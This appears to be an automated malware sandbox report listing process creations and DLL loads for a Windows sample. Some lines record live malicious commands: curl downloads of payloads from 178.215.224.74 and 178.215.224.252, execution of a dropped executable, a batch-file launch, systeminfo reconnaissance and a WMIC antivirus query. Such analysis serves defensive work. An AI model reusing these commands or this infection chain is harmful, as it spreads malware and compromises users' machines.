Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C systeminfo | findstr /C:"OS Name" > C:\Users\user\AppData\Roaming\DolphinDumps\jvx 2>&1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe "C:\Users\user\AppData\Local\temp\RevenueDevices.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /C curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\768032\Finish.com Process created: unknown unknown Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr "C:\Users\user\AppData\Local\InnoSphere Dynamics\InnoSphere.scr" "C:\Users\user\AppData\Local\InnoSphere Dynamics\l"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\wbem\WMIC.exe WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tewjy" "178.215.224.252/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sihmk" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ekcal" "178.215.224.74/v10/ukyh.php?jspo=5"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\vuevs" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fsqyf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\dmgfe" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=YXp2dy5leGU%3D"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\woejq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\xvway" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\tlbry" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=eGh3cS56aXA%3D"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Users\user\AppData\Roaming\DolphinDumps\azvw.exe azvw.exe -o xhwq.zip
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\sirxu" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gtnez" "178.215.224.74/v10/ukyh.php?jspo=31"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\systeminfo.exe systeminfo
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\findstr.exe findstr /C:"OS Name"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gfdap" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\gjmcf" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\lkufr" "178.215.224.74/v10/ukyh.php?jspo=7"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\slpug" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ixhzf" "178.215.224.74/v10/ukyh.php?jspo=10&melq=1"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\qhiwq" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\ypalg" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\cbmaa" "178.215.224.74/v10/ukyh.php?jspo=35&xvgj=UmV2ZW51ZURldmljZXMuZXhl"
Source: C:\Users\user\AppData\Local\Temp\RevenueDevices.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Seek Seek.cmd & Seek.cmd
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\hzpaz" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\fxhyo" "178.215.224.74/v10/ukyh.php?gi"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\curl.exe curl -s -o "C:\Users\user\AppData\Local\temp\jocox" "178.215.224.74/v10/ukyh.php?jspo=6"
Source: C:\Users\user\Desktop\file.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: shfolder.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textinputframework.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coreuicomponents.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: coremessaging.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: wintypes.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: textshaping.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: edputil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: windows.staterepositoryps.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: appresolver.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: bcp47langs.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: slc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: sppc.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecorecommonproxystub.dll Jump to behavior
Source: C:\Users\user\Desktop\file.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: cmdext.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: version.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: framedynos.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: dbghelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe Section loaded: kernel.appcore.dll Jump to behavior
